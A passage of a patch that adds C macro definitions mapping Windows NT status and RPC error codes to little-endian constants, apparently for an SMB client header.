++#define STATUS_CS_ENCRYPTION_FILE_NOT_CSE cpu_to_le32(0xC0000445)
++#define STATUS_INVALID_LABEL cpu_to_le32(0xC0000446)
++#define STATUS_DRIVER_PROCESS_TERMINATED cpu_to_le32(0xC0000450)
++#define STATUS_AMBIGUOUS_SYSTEM_DEVICE cpu_to_le32(0xC0000451)
++#define STATUS_SYSTEM_DEVICE_NOT_FOUND cpu_to_le32(0xC0000452)
++#define STATUS_RESTART_BOOT_APPLICATION cpu_to_le32(0xC0000453)
++#define STATUS_INVALID_TASK_NAME cpu_to_le32(0xC0000500)
++#define STATUS_INVALID_TASK_INDEX cpu_to_le32(0xC0000501)
++#define STATUS_THREAD_ALREADY_IN_TASK cpu_to_le32(0xC0000502)
++#define STATUS_CALLBACK_BYPASS cpu_to_le32(0xC0000503)
++#define STATUS_PORT_CLOSED cpu_to_le32(0xC0000700)
++#define STATUS_MESSAGE_LOST cpu_to_le32(0xC0000701)
++#define STATUS_INVALID_MESSAGE cpu_to_le32(0xC0000702)
++#define STATUS_REQUEST_CANCELED cpu_to_le32(0xC0000703)
++#define STATUS_RECURSIVE_DISPATCH cpu_to_le32(0xC0000704)
++#define STATUS_LPC_RECEIVE_BUFFER_EXPECTED cpu_to_le32(0xC0000705)
++#define STATUS_LPC_INVALID_CONNECTION_USAGE cpu_to_le32(0xC0000706)
++#define STATUS_LPC_REQUESTS_NOT_ALLOWED cpu_to_le32(0xC0000707)
++#define STATUS_RESOURCE_IN_USE cpu_to_le32(0xC0000708)
++#define STATUS_HARDWARE_MEMORY_ERROR cpu_to_le32(0xC0000709)
++#define STATUS_THREADPOOL_HANDLE_EXCEPTION cpu_to_le32(0xC000070A)
++#define STATUS_THREADPOOL_SET_EVENT_ON_COMPLETION_FAILED cpu_to_le32(0xC000070B)
++#define STATUS_THREADPOOL_RELEASE_SEMAPHORE_ON_COMPLETION_FAILED cpu_to_le32(0xC000070C)
++#define STATUS_THREADPOOL_RELEASE_MUTEX_ON_COMPLETION_FAILED cpu_to_le32(0xC000070D)
++#define STATUS_THREADPOOL_FREE_LIBRARY_ON_COMPLETION_FAILED cpu_to_le32(0xC000070E)
++#define STATUS_THREADPOOL_RELEASED_DURING_OPERATION cpu_to_le32(0xC000070F)
++#define STATUS_CALLBACK_RETURNED_WHILE_IMPERSONATING cpu_to_le32(0xC0000710)
++#define STATUS_APC_RETURNED_WHILE_IMPERSONATING cpu_to_le32(0xC0000711)
++#define STATUS_PROCESS_IS_PROTECTED cpu_to_le32(0xC0000712)
++#define STATUS_MCA_EXCEPTION cpu_to_le32(0xC0000713)
++#define STATUS_CERTIFICATE_MAPPING_NOT_UNIQUE cpu_to_le32(0xC0000714)
++#define STATUS_SYMLINK_CLASS_DISABLED cpu_to_le32(0xC0000715)
++#define STATUS_INVALID_IDN_NORMALIZATION cpu_to_le32(0xC0000716)
++#define STATUS_NO_UNICODE_TRANSLATION cpu_to_le32(0xC0000717)
++#define STATUS_ALREADY_REGISTERED cpu_to_le32(0xC0000718)
++#define STATUS_CONTEXT_MISMATCH cpu_to_le32(0xC0000719)
++#define STATUS_PORT_ALREADY_HAS_COMPLETION_LIST cpu_to_le32(0xC000071A)
++#define STATUS_CALLBACK_RETURNED_THREAD_PRIORITY cpu_to_le32(0xC000071B)
++#define STATUS_INVALID_THREAD cpu_to_le32(0xC000071C)
++#define STATUS_CALLBACK_RETURNED_TRANSACTION cpu_to_le32(0xC000071D)
++#define STATUS_CALLBACK_RETURNED_LDR_LOCK cpu_to_le32(0xC000071E)
++#define STATUS_CALLBACK_RETURNED_LANG cpu_to_le32(0xC000071F)
++#define STATUS_CALLBACK_RETURNED_PRI_BACK cpu_to_le32(0xC0000720)
++#define STATUS_CALLBACK_RETURNED_THREAD_AFFINITY cpu_to_le32(0xC0000721)
++#define STATUS_DISK_REPAIR_DISABLED cpu_to_le32(0xC0000800)
++#define STATUS_DS_DOMAIN_RENAME_IN_PROGRESS cpu_to_le32(0xC0000801)
++#define STATUS_DISK_QUOTA_EXCEEDED cpu_to_le32(0xC0000802)
++#define STATUS_CONTENT_BLOCKED cpu_to_le32(0xC0000804)
++#define STATUS_BAD_CLUSTERS cpu_to_le32(0xC0000805)
++#define STATUS_VOLUME_DIRTY cpu_to_le32(0xC0000806)
++#define STATUS_FILE_CHECKED_OUT cpu_to_le32(0xC0000901)
++#define STATUS_CHECKOUT_REQUIRED cpu_to_le32(0xC0000902)
++#define STATUS_BAD_FILE_TYPE cpu_to_le32(0xC0000903)
++#define STATUS_FILE_TOO_LARGE cpu_to_le32(0xC0000904)
++#define STATUS_FORMS_AUTH_REQUIRED cpu_to_le32(0xC0000905)
++#define STATUS_VIRUS_INFECTED cpu_to_le32(0xC0000906)
++#define STATUS_VIRUS_DELETED cpu_to_le32(0xC0000907)
++#define STATUS_BAD_MCFG_TABLE cpu_to_le32(0xC0000908)
++#define STATUS_WOW_ASSERTION cpu_to_le32(0xC0009898)
++#define STATUS_INVALID_SIGNATURE cpu_to_le32(0xC000A000)
++#define STATUS_HMAC_NOT_SUPPORTED cpu_to_le32(0xC000A001)
++#define STATUS_IPSEC_QUEUE_OVERFLOW cpu_to_le32(0xC000A010)
++#define STATUS_ND_QUEUE_OVERFLOW cpu_to_le32(0xC000A011)
++#define STATUS_HOPLIMIT_EXCEEDED cpu_to_le32(0xC000A012)
++#define STATUS_PROTOCOL_NOT_SUPPORTED cpu_to_le32(0xC000A013)
++#define STATUS_LOST_WRITEBEHIND_DATA_NETWORK_DISCONNECTED cpu_to_le32(0xC000A080)
++#define STATUS_LOST_WRITEBEHIND_DATA_NETWORK_SERVER_ERROR cpu_to_le32(0xC000A081)
++#define STATUS_LOST_WRITEBEHIND_DATA_LOCAL_DISK_ERROR cpu_to_le32(0xC000A082)
++#define STATUS_XML_PARSE_ERROR cpu_to_le32(0xC000A083)
++#define STATUS_XMLDSIG_ERROR cpu_to_le32(0xC000A084)
++#define STATUS_WRONG_COMPARTMENT cpu_to_le32(0xC000A085)
++#define STATUS_AUTHIP_FAILURE cpu_to_le32(0xC000A086)
++#define DBG_NO_STATE_CHANGE cpu_to_le32(0xC0010001)
++#define DBG_APP_NOT_IDLE cpu_to_le32(0xC0010002)
++#define RPC_NT_INVALID_STRING_BINDING cpu_to_le32(0xC0020001)
++#define RPC_NT_WRONG_KIND_OF_BINDING cpu_to_le32(0xC0020002)
++#define RPC_NT_INVALID_BINDING cpu_to_le32(0xC0020003)
++#define RPC_NT_PROTSEQ_NOT_SUPPORTED cpu_to_le32(0xC0020004)
++#define RPC_NT_INVALID_RPC_PROTSEQ cpu_to_le32(0xC0020005)
++#define RPC_NT_INVALID_STRING_UUID cpu_to_le32(0xC0020006)
++#define RPC_NT_INVALID_ENDPOINT_FORMAT cpu_to_le32(0xC0020007)
++#define RPC_NT_INVALID_NET_ADDR cpu_to_le32(0xC0020008)
++#define RPC_NT_NO_ENDPOINT_FOUND cpu_to_le32(0xC0020009)
++#define RPC_NT_INVALID_TIMEOUT cpu_to_le32(0xC002000A)
++#define RPC_NT_OBJECT_NOT_FOUND cpu_to_le32(0xC002000B)
++#define RPC_NT_ALREADY_REGISTERED cpu_to_le32(0xC002000C)
++#define RPC_NT_TYPE_ALREADY_REGISTERED cpu_to_le32(0xC002000D)
++#define RPC_NT_ALREADY_LISTENING cpu_to_le32(0xC002000E)
++#define RPC_NT_NO_PROTSEQS_REGISTERED cpu_to_le32(0xC002000F)
++#define RPC_NT_NOT_LISTENING cpu_to_le32(0xC0020010)
++#define RPC_NT_UNKNOWN_MGR_TYPE cpu_to_le32(0xC0020011)
++#define RPC_NT_UNKNOWN_IF cpu_to_le32(0xC0020012)
++#define RPC_NT_NO_BINDINGS cpu_to_le32(0xC0020013)
++#define RPC_NT_NO_PROTSEQS cpu_to_le32(0xC0020014)
++#define RPC_NT_CANT_CREATE_ENDPOINT cpu_to_le32(0xC0020015)
++#define RPC_NT_OUT_OF_RESOURCES cpu_to_le32(0xC0020016)
++#define RPC_NT_SERVER_UNAVAILABLE cpu_to_le32(0xC0020017)
++#define RPC_NT_SERVER_TOO_BUSY cpu_to_le32(0xC0020018)
++#define RPC_NT_INVALID_NETWORK_OPTIONS cpu_to_le32(0xC0020019)
++#define RPC_NT_NO_CALL_ACTIVE cpu_to_le32(0xC002001A)
++#define RPC_NT_CALL_FAILED cpu_to_le32(0xC002001B)
++#define RPC_NT_CALL_FAILED_DNE cpu_to_le32(0xC002001C)
++#define RPC_NT_PROTOCOL_ERROR cpu_to_le32(0xC002001D)
++#define RPC_NT_UNSUPPORTED_TRANS_SYN cpu_to_le32(0xC002001F)
++#define RPC_NT_UNSUPPORTED_TYPE cpu_to_le32(0xC0020021)
++#define RPC_NT_INVALID_TAG cpu_to_le32(0xC0020022)
++#define RPC_NT_INVALID_BOUND cpu_to_le32(0xC0020023)
++#define RPC_NT_NO_ENTRY_NAME cpu_to_le32(0xC0020024)
++#define RPC_NT_INVALID_NAME_SYNTAX cpu_to_le32(0xC0020025)
++#define RPC_NT_UNSUPPORTED_NAME_SYNTAX cpu_to_le32(0xC0020026)
++#define RPC_NT_UUID_NO_ADDRESS cpu_to_le32(0xC0020028)
++#define RPC_NT_DUPLICATE_ENDPOINT cpu_to_le32(0xC0020029)
++#define RPC_NT_UNKNOWN_AUTHN_TYPE cpu_to_le32(0xC002002A)
++#define RPC_NT_MAX_CALLS_TOO_SMALL cpu_to_le32(0xC002002B)
++#define RPC_NT_STRING_TOO_LONG cpu_to_le32(0xC002002C)
++#define RPC_NT_PROTSEQ_NOT_FOUND cpu_to_le32(0xC002002D)
++#define RPC_NT_PROCNUM_OUT_OF_RANGE cpu_to_le32(0xC002002E)
++#define RPC_NT_BINDING_HAS_NO_AUTH cpu_to_le32(0xC002002F)
++#define RPC_NT_UNKNOWN_AUTHN_SERVICE cpu_to_le32(0xC0020030)
++#define RPC_NT_UNKNOWN_AUTHN_LEVEL cpu_to_le32(0xC0020031)
++#define RPC_NT_INVALID_AUTH_IDENTITY cpu_to_le32(0xC0020032)
++#define RPC_NT_UNKNOWN_AUTHZ_SERVICE cpu_to_le32(0xC0020033)
++#define EPT_NT_INVALID_ENTRY cpu_to_le32(0xC0020034)
++#define EPT_NT_CANT_PERFORM_OP cpu_to_le32(0xC0020035)
++#define EPT_NT_NOT_REGISTERED cpu_to_le32(0xC0020036)
++#define RPC_NT_NOTHING_TO_EXPORT cpu_to_le32(0xC0020037)
++#define RPC_NT_INCOMPLETE_NAME cpu_to_le32(0xC0020038)
++#define RPC_NT_INVALID_VERS_OPTION cpu_to_le32(0xC0020039)
++#define RPC_NT_NO_MORE_MEMBERS cpu_to_le32(0xC002003A)
++#define RPC_NT_NOT_ALL_OBJS_UNEXPORTED cpu_to_le32(0xC002003B)
++#define RPC_NT_INTERFACE_NOT_FOUND cpu_to_le32(0xC002003C)
++#define RPC_NT_ENTRY_ALREADY_EXISTS cpu_to_le32(0xC002003D)
++#define RPC_NT_ENTRY_NOT_FOUND cpu_to_le32(0xC002003E)
++#define RPC_NT_NAME_SERVICE_UNAVAILABLE cpu_to_le32(0xC002003F)
++#define RPC_NT_INVALID_NAF_ID cpu_to_le32(0xC0020040)
++#define RPC_NT_CANNOT_SUPPORT cpu_to_le32(0xC0020041)
++#define RPC_NT_NO_CONTEXT_AVAILABLE cpu_to_le32(0xC0020042)
++#define RPC_NT_INTERNAL_ERROR cpu_to_le32(0xC0020043)
++#define RPC_NT_ZERO_DIVIDE cpu_to_le32(0xC0020044)
++#define RPC_NT_ADDRESS_ERROR cpu_to_le32(0xC0020045)
++#define RPC_NT_FP_DIV_ZERO cpu_to_le32(0xC0020046)
++#define RPC_NT_FP_UNDERFLOW cpu_to_le32(0xC0020047)
++#define RPC_NT_FP_OVERFLOW cpu_to_le32(0xC0020048)
++#define RPC_NT_CALL_IN_PROGRESS cpu_to_le32(0xC0020049)
++#define RPC_NT_NO_MORE_BINDINGS cpu_to_le32(0xC002004A)
++#define RPC_NT_GROUP_MEMBER_NOT_FOUND cpu_to_le32(0xC002004B)
++#define EPT_NT_CANT_CREATE cpu_to_le32(0xC002004C)
++#define RPC_NT_INVALID_OBJECT cpu_to_le32(0xC002004D)
++#define RPC_NT_NO_INTERFACES cpu_to_le32(0xC002004F)
++#define RPC_NT_CALL_CANCELLED cpu_to_le32(0xC0020050)
++#define RPC_NT_BINDING_INCOMPLETE cpu_to_le32(0xC0020051)
++#define RPC_NT_COMM_FAILURE cpu_to_le32(0xC0020052)
++#define RPC_NT_UNSUPPORTED_AUTHN_LEVEL cpu_to_le32(0xC0020053)
++#define RPC_NT_NO_PRINC_NAME cpu_to_le32(0xC0020054)
++#define RPC_NT_NOT_RPC_ERROR cpu_to_le32(0xC0020055)
++#define RPC_NT_SEC_PKG_ERROR cpu_to_le32(0xC0020057)
++#define RPC_NT_NOT_CANCELLED cpu_to_le32(0xC0020058)
++#define RPC_NT_INVALID_ASYNC_HANDLE cpu_to_le32(0xC0020062)
++#define RPC_NT_INVALID_ASYNC_CALL cpu_to_le32(0xC0020063)
++#define RPC_NT_PROXY_ACCESS_DENIED cpu_to_le32(0xC0020064)
++#define RPC_NT_NO_MORE_ENTRIES cpu_to_le32(0xC0030001)
++#define RPC_NT_SS_CHAR_TRANS_OPEN_FAIL cpu_to_le32(0xC0030002)
++#define RPC_NT_SS_CHAR_TRANS_SHORT_FILE cpu_to_le32(0xC0030003)
++#define RPC_NT_SS_IN_NULL_CONTEXT cpu_to_le32(0xC0030004)
++#define RPC_NT_SS_CONTEXT_MISMATCH cpu_to_le32(0xC0030005)
++#define RPC_NT_SS_CONTEXT_DAMAGED cpu_to_le32(0xC0030006)
++#define RPC_NT_SS_HANDLES_MISMATCH cpu_to_le32(0xC0030007)
++#define RPC_NT_SS_CANNOT_GET_CALL_HANDLE cpu_to_le32(0xC0030008)
++#define RPC_NT_NULL_REF_POINTER cpu_to_le32(0xC0030009)
++#define RPC_NT_ENUM_VALUE_OUT_OF_RANGE cpu_to_le32(0xC003000A)
++#define RPC_NT_BYTE_COUNT_TOO_SMALL cpu_to_le32(0xC003000B)
++#define RPC_NT_BAD_STUB_DATA cpu_to_le32(0xC003000C)
++#define RPC_NT_INVALID_ES_ACTION cpu_to_le32(0xC0030059)
++#define RPC_NT_WRONG_ES_VERSION cpu_to_le32(0xC003005A)
++#define RPC_NT_WRONG_STUB_VERSION cpu_to_le32(0xC003005B)
++#define RPC_NT_INVALID_PIPE_OBJECT cpu_to_le32(0xC003005C)
++#define RPC_NT_INVALID_PIPE_OPERATION cpu_to_le32(0xC003005D)
++#define RPC_NT_WRONG_PIPE_VERSION cpu_to_le32(0xC003005E)
++#define RPC_NT_PIPE_CLOSED cpu_to_le32(0xC003005F)
++#define RPC_NT_PIPE_DISCIPLINE_ERROR cpu_to_le32(0xC0030060)
++#define RPC_NT_PIPE_EMPTY cpu_to_le32(0xC0030061)
++#define STATUS_PNP_BAD_MPS_TABLE cpu_to_le32(0xC0040035)
++#define STATUS_PNP_TRANSLATION_FAILED cpu_to_le32(0xC0040036)
++#define STATUS_PNP_IRQ_TRANSLATION_FAILED cpu_to_le32(0xC0040037)
++#define STATUS_PNP_INVALID_ID cpu_to_le32(0xC0040038)
++#define STATUS_IO_REISSUE_AS_CACHED cpu_to_le32(0xC0040039)
++#define STATUS_CTX_WINSTATION_NAME_INVALID cpu_to_le32(0xC00A0001)
++#define STATUS_CTX_INVALID_PD cpu_to_le32(0xC00A0002)
++#define STATUS_CTX_PD_NOT_FOUND cpu_to_le32(0xC00A0003)
++#define STATUS_CTX_CLOSE_PENDING cpu_to_le32(0xC00A0006)
++#define STATUS_CTX_NO_OUTBUF cpu_to_le32(0xC00A0007)
++#define STATUS_CTX_MODEM_INF_NOT_FOUND cpu_to_le32(0xC00A0008)
++#define STATUS_CTX_INVALID_MODEMNAME cpu_to_le32(0xC00A0009)
++#define STATUS_CTX_RESPONSE_ERROR cpu_to_le32(0xC00A000A)
++#define STATUS_CTX_MODEM_RESPONSE_TIMEOUT cpu_to_le32(0xC00A000B)
++#define STATUS_CTX_MODEM_RESPONSE_NO_CARRIER cpu_to_le32(0xC00A000C)
++#define STATUS_CTX_MODEM_RESPONSE_NO_DIALTONE cpu_to_le32(0xC00A000D)
++#define STATUS_CTX_MODEM_RESPONSE_BUSY cpu_to_le32(0xC00A000E)
++#define STATUS_CTX_MODEM_RESPONSE_VOICE cpu_to_le32(0xC00A000F)
++#define STATUS_CTX_TD_ERROR cpu_to_le32(0xC00A0010)
++#define STATUS_CTX_LICENSE_CLIENT_INVALID cpu_to_le32(0xC00A0012)
++#define STATUS_CTX_LICENSE_NOT_AVAILABLE cpu_to_le32(0xC00A0013)
++#define STATUS_CTX_LICENSE_EXPIRED cpu_to_le32(0xC00A0014)
++#define STATUS_CTX_WINSTATION_NOT_FOUND cpu_to_le32(0xC00A0015)
++#define STATUS_CTX_WINSTATION_NAME_COLLISION cpu_to_le32(0xC00A0016)
++#define STATUS_CTX_WINSTATION_BUSY cpu_to_le32(0xC00A0017)
++#define STATUS_CTX_BAD_VIDEO_MODE cpu_to_le32(0xC00A0018)
++#define STATUS_CTX_GRAPHICS_INVALID cpu_to_le32(0xC00A0022)
++#define STATUS_CTX_NOT_CONSOLE cpu_to_le32(0xC00A0024)
++#define STATUS_CTX_CLIENT_QUERY_TIMEOUT cpu_to_le32(0xC00A0026)
++#define STATUS_CTX_CONSOLE_DISCONNECT cpu_to_le32(0xC00A0027)
++#define STATUS_CTX_CONSOLE_CONNECT cpu_to_le32(0xC00A0028)
++#define STATUS_CTX_SHADOW_DENIED cpu_to_le32(0xC00A002A)
++#define STATUS_CTX_WINSTATION_ACCESS_DENIED cpu_to_le32(0xC00A002B)
++#define STATUS_CTX_INVALID_WD cpu_to_le32(0xC00A002E)
++#define STATUS_CTX_WD_NOT_FOUND cpu_to_le32(0xC00A002F)
++#define STATUS_CTX_SHADOW_INVALID cpu_to_le32(0xC00A0030)
++#define STATUS_CTX_SHADOW_DISABLED cpu_to_le32(0xC00A0031)
++#define STATUS_RDP_PROTOCOL_ERROR cpu_to_le32(0xC00A0032)
++#define STATUS_CTX_CLIENT_LICENSE_NOT_SET cpu_to_le32(0xC00A0033)
++#define STATUS_CTX_CLIENT_LICENSE_IN_USE cpu_to_le32(0xC00A0034)
++#define STATUS_CTX_SHADOW_ENDED_BY_MODE_CHANGE cpu_to_le32(0xC00A0035)
++#define STATUS_CTX_SHADOW_NOT_RUNNING cpu_to_le32(0xC00A0036)
++#define STATUS_CTX_LOGON_DISABLED cpu_to_le32(0xC00A0037)
++#define STATUS_CTX_SECURITY_LAYER_ERROR cpu_to_le32(0xC00A0038)
++#define STATUS_TS_INCOMPATIBLE_SESSIONS cpu_to_le32(0xC00A0039)
++#define STATUS_MUI_FILE_NOT_FOUND cpu_to_le32(0xC00B0001)
++#define STATUS_MUI_INVALID_FILE cpu_to_le32(0xC00B0002)
++#define STATUS_MUI_INVALID_RC_CONFIG cpu_to_le32(0xC00B0003)
++#define STATUS_MUI_INVALID_LOCALE_NAME cpu_to_le32(0xC00B0004)
++#define STATUS_MUI_INVALID_ULTIMATEFALLBACK_NAME cpu_to_le32(0xC00B0005)
++#define STATUS_MUI_FILE_NOT_LOADED cpu_to_le32(0xC00B0006)
++#define STATUS_RESOURCE_ENUM_USER_STOP cpu_to_le32(0xC00B0007)
++#define STATUS_CLUSTER_INVALID_NODE cpu_to_le32(0xC0130001)
++#define STATUS_CLUSTER_NODE_EXISTS cpu_to_le32(0xC0130002)
++#define STATUS_CLUSTER_JOIN_IN_PROGRESS cpu_to_le32(0xC0130003)
++#define STATUS_CLUSTER_NODE_NOT_FOUND cpu_to_le32(0xC0130004)
++#define STATUS_CLUSTER_LOCAL_NODE_NOT_FOUND cpu_to_le32(0xC0130005)
++#define STATUS_CLUSTER_NETWORK_EXISTS cpu_to_le32(0xC0130006)
++#define STATUS_CLUSTER_NETWORK_NOT_FOUND cpu_to_le32(0xC0130007)
++#define STATUS_CLUSTER_NETINTERFACE_EXISTS cpu_to_le32(0xC0130008)
++#define STATUS_CLUSTER_NETINTERFACE_NOT_FOUND cpu_to_le32(0xC0130009)
++#define STATUS_CLUSTER_INVALID_REQUEST cpu_to_le32(0xC013000A)
++#define STATUS_CLUSTER_INVALID_NETWORK_PROVIDER cpu_to_le32(0xC013000B)
++#define STATUS_CLUSTER_NODE_DOWN cpu_to_le32(0xC013000C)
++#define STATUS_CLUSTER_NODE_UNREACHABLE cpu_to_le32(0xC013000D)
++#define STATUS_CLUSTER_NODE_NOT_MEMBER cpu_to_le32(0xC013000E)
++#define STATUS_CLUSTER_JOIN_NOT_IN_PROGRESS cpu_to_le32(0xC013000F)
++#define STATUS_CLUSTER_INVALID_NETWORK cpu_to_le32(0xC0130010)
++#define STATUS_CLUSTER_NO_NET_ADAPTERS cpu_to_le32(0xC0130011)
++#define STATUS_CLUSTER_NODE_UP cpu_to_le32(0xC0130012)
++#define STATUS_CLUSTER_NODE_PAUSED cpu_to_le32(0xC0130013)
++#define STATUS_CLUSTER_NODE_NOT_PAUSED cpu_to_le32(0xC0130014)
++#define STATUS_CLUSTER_NO_SECURITY_CONTEXT cpu_to_le32(0xC0130015)
++#define STATUS_CLUSTER_NETWORK_NOT_INTERNAL cpu_to_le32(0xC0130016)
++#define STATUS_CLUSTER_POISONED cpu_to_le32(0xC0130017)
++#define STATUS_ACPI_INVALID_OPCODE cpu_to_le32(0xC0140001)
++#define STATUS_ACPI_STACK_OVERFLOW cpu_to_le32(0xC0140002)
++#define STATUS_ACPI_ASSERT_FAILED cpu_to_le32(0xC0140003)
++#define STATUS_ACPI_INVALID_INDEX cpu_to_le32(0xC0140004)
++#define STATUS_ACPI_INVALID_ARGUMENT cpu_to_le32(0xC0140005)
++#define STATUS_ACPI_FATAL cpu_to_le32(0xC0140006)
++#define STATUS_ACPI_INVALID_SUPERNAME cpu_to_le32(0xC0140007)
++#define STATUS_ACPI_INVALID_ARGTYPE cpu_to_le32(0xC0140008)
++#define STATUS_ACPI_INVALID_OBJTYPE cpu_to_le32(0xC0140009)
++#define STATUS_ACPI_INVALID_TARGETTYPE cpu_to_le32(0xC014000A)
++#define STATUS_ACPI_INCORRECT_ARGUMENT_COUNT cpu_to_le32(0xC014000B)
++#define STATUS_ACPI_ADDRESS_NOT_MAPPED cpu_to_le32(0xC014000C)
++#define STATUS_ACPI_INVALID_EVENTTYPE cpu_to_le32(0xC014000D)
++#define STATUS_ACPI_HANDLER_COLLISION cpu_to_le32(0xC014000E)
++#define STATUS_ACPI_INVALID_DATA cpu_to_le32(0xC014000F)
++#define STATUS_ACPI_INVALID_REGION cpu_to_le32(0xC0140010)
++#define STATUS_ACPI_INVALID_ACCESS_SIZE cpu_to_le32(0xC0140011)
++#define STATUS_ACPI_ACQUIRE_GLOBAL_LOCK cpu_to_le32(0xC0140012)
++#define STATUS_ACPI_ALREADY_INITIALIZED cpu_to_le32(0xC0140013)
++#define STATUS_ACPI_NOT_INITIALIZED cpu_to_le32(0xC0140014)
++#define STATUS_ACPI_INVALID_MUTEX_LEVEL cpu_to_le32(0xC0140015)
++#define STATUS_ACPI_MUTEX_NOT_OWNED cpu_to_le32(0xC0140016)
++#define STATUS_ACPI_MUTEX_NOT_OWNER cpu_to_le32(0xC0140017)
++#define STATUS_ACPI_RS_ACCESS cpu_to_le32(0xC0140018)
++#define STATUS_ACPI_INVALID_TABLE cpu_to_le32(0xC0140019)
++#define STATUS_ACPI_REG_HANDLER_FAILED cpu_to_le32(0xC0140020)
++#define STATUS_ACPI_POWER_REQUEST_FAILED cpu_to_le32(0xC0140021)
++#define STATUS_SXS_SECTION_NOT_FOUND cpu_to_le32(0xC0150001)
++#define STATUS_SXS_CANT_GEN_ACTCTX cpu_to_le32(0xC0150002)
++#define STATUS_SXS_INVALID_ACTCTXDATA_FORMAT cpu_to_le32(0xC0150003)
++#define STATUS_SXS_ASSEMBLY_NOT_FOUND cpu_to_le32(0xC0150004)
++#define STATUS_SXS_MANIFEST_FORMAT_ERROR cpu_to_le32(0xC0150005)
++#define STATUS_SXS_MANIFEST_PARSE_ERROR cpu_to_le32(0xC0150006)
++#define STATUS_SXS_ACTIVATION_CONTEXT_DISABLED cpu_to_le32(0xC0150007)
++#define STATUS_SXS_KEY_NOT_FOUND cpu_to_le32(0xC0150008)
++#define STATUS_SXS_VERSION_CONFLICT cpu_to_le32(0xC0150009)
++#define STATUS_SXS_WRONG_SECTION_TYPE cpu_to_le32(0xC015000A)
++#define STATUS_SXS_THREAD_QUERIES_DISABLED cpu_to_le32(0xC015000B)
++#define STATUS_SXS_ASSEMBLY_MISSING cpu_to_le32(0xC015000C)
++#define STATUS_SXS_PROCESS_DEFAULT_ALREADY_SET cpu_to_le32(0xC015000E)
++#define STATUS_SXS_EARLY_DEACTIVATION cpu_to_le32(0xC015000F)
++#define STATUS_SXS_INVALID_DEACTIVATION cpu_to_le32(0xC0150010)
++#define STATUS_SXS_MULTIPLE_DEACTIVATION cpu_to_le32(0xC0150011)
++#define STATUS_SXS_SYSTEM_DEFAULT_ACTIVATION_CONTEXT_EMPTY cpu_to_le32(0xC0150012)
++#define STATUS_SXS_PROCESS_TERMINATION_REQUESTED cpu_to_le32(0xC0150013)
++#define STATUS_SXS_CORRUPT_ACTIVATION_STACK cpu_to_le32(0xC0150014)
++#define STATUS_SXS_CORRUPTION cpu_to_le32(0xC0150015)
++#define STATUS_SXS_INVALID_IDENTITY_ATTRIBUTE_VALUE cpu_to_le32(0xC0150016)
++#define STATUS_SXS_INVALID_IDENTITY_ATTRIBUTE_NAME cpu_to_le32(0xC0150017)
++#define STATUS_SXS_IDENTITY_DUPLICATE_ATTRIBUTE cpu_to_le32(0xC0150018)
++#define STATUS_SXS_IDENTITY_PARSE_ERROR cpu_to_le32(0xC0150019)
++#define STATUS_SXS_COMPONENT_STORE_CORRUPT cpu_to_le32(0xC015001A)
++#define STATUS_SXS_FILE_HASH_MISMATCH cpu_to_le32(0xC015001B)
++#define STATUS_SXS_MANIFEST_IDENTITY_SAME_BUT_CONTENTS_DIFFERENT cpu_to_le32(0xC015001C)
++#define STATUS_SXS_IDENTITIES_DIFFERENT cpu_to_le32(0xC015001D)
++#define STATUS_SXS_ASSEMBLY_IS_NOT_A_DEPLOYMENT cpu_to_le32(0xC015001E)
++#define STATUS_SXS_FILE_NOT_PART_OF_ASSEMBLY cpu_to_le32(0xC015001F)
++#define STATUS_ADVANCED_INSTALLER_FAILED cpu_to_le32(0xC0150020)
++#define STATUS_XML_ENCODING_MISMATCH cpu_to_le32(0xC0150021)
++#define STATUS_SXS_MANIFEST_TOO_BIG cpu_to_le32(0xC0150022)
++#define STATUS_SXS_SETTING_NOT_REGISTERED cpu_to_le32(0xC0150023)
++#define STATUS_SXS_TRANSACTION_CLOSURE_INCOMPLETE cpu_to_le32(0xC0150024)
++#define STATUS_SMI_PRIMITIVE_INSTALLER_FAILED cpu_to_le32(0xC0150025)
++#define STATUS_GENERIC_COMMAND_FAILED cpu_to_le32(0xC0150026)
++#define STATUS_SXS_FILE_HASH_MISSING cpu_to_le32(0xC0150027)
++#define STATUS_TRANSACTIONAL_CONFLICT cpu_to_le32(0xC0190001)
++#define STATUS_INVALID_TRANSACTION cpu_to_le32(0xC0190002)
++#define STATUS_TRANSACTION_NOT_ACTIVE cpu_to_le32(0xC0190003)
++#define STATUS_TM_INITIALIZATION_FAILED cpu_to_le32(0xC0190004)
++#define STATUS_RM_NOT_ACTIVE cpu_to_le32(0xC0190005)
++#define STATUS_RM_METADATA_CORRUPT cpu_to_le32(0xC0190006)
++#define STATUS_TRANSACTION_NOT_JOINED cpu_to_le32(0xC0190007)
++#define STATUS_DIRECTORY_NOT_RM cpu_to_le32(0xC0190008)
++#define STATUS_TRANSACTIONS_UNSUPPORTED_REMOTE cpu_to_le32(0xC019000A)
++#define STATUS_LOG_RESIZE_INVALID_SIZE cpu_to_le32(0xC019000B)
++#define STATUS_REMOTE_FILE_VERSION_MISMATCH cpu_to_le32(0xC019000C)
++#define STATUS_CRM_PROTOCOL_ALREADY_EXISTS cpu_to_le32(0xC019000F)
++#define STATUS_TRANSACTION_PROPAGATION_FAILED cpu_to_le32(0xC0190010)
++#define STATUS_CRM_PROTOCOL_NOT_FOUND cpu_to_le32(0xC0190011)
++#define STATUS_TRANSACTION_SUPERIOR_EXISTS cpu_to_le32(0xC0190012)
++#define STATUS_TRANSACTION_REQUEST_NOT_VALID cpu_to_le32(0xC0190013)
++#define STATUS_TRANSACTION_NOT_REQUESTED cpu_to_le32(0xC0190014)
++#define STATUS_TRANSACTION_ALREADY_ABORTED cpu_to_le32(0xC0190015)
++#define STATUS_TRANSACTION_ALREADY_COMMITTED cpu_to_le32(0xC0190016)
++#define STATUS_TRANSACTION_INVALID_MARSHALL_BUFFER cpu_to_le32(0xC0190017)
++#define STATUS_CURRENT_TRANSACTION_NOT_VALID cpu_to_le32(0xC0190018)
++#define STATUS_LOG_GROWTH_FAILED cpu_to_le32(0xC0190019)
++#define STATUS_OBJECT_NO_LONGER_EXISTS cpu_to_le32(0xC0190021)
++#define STATUS_STREAM_MINIVERSION_NOT_FOUND cpu_to_le32(0xC0190022)
++#define STATUS_STREAM_MINIVERSION_NOT_VALID cpu_to_le32(0xC0190023)
++#define STATUS_MINIVERSION_INACCESSIBLE_FROM_SPECIFIED_TRANSACTION cpu_to_le32(0xC0190024)
++#define STATUS_CANT_OPEN_MINIVERSION_WITH_MODIFY_INTENT cpu_to_le32(0xC0190025)
++#define STATUS_CANT_CREATE_MORE_STREAM_MINIVERSIONS cpu_to_le32(0xC0190026)
++#define STATUS_HANDLE_NO_LONGER_VALID cpu_to_le32(0xC0190028)
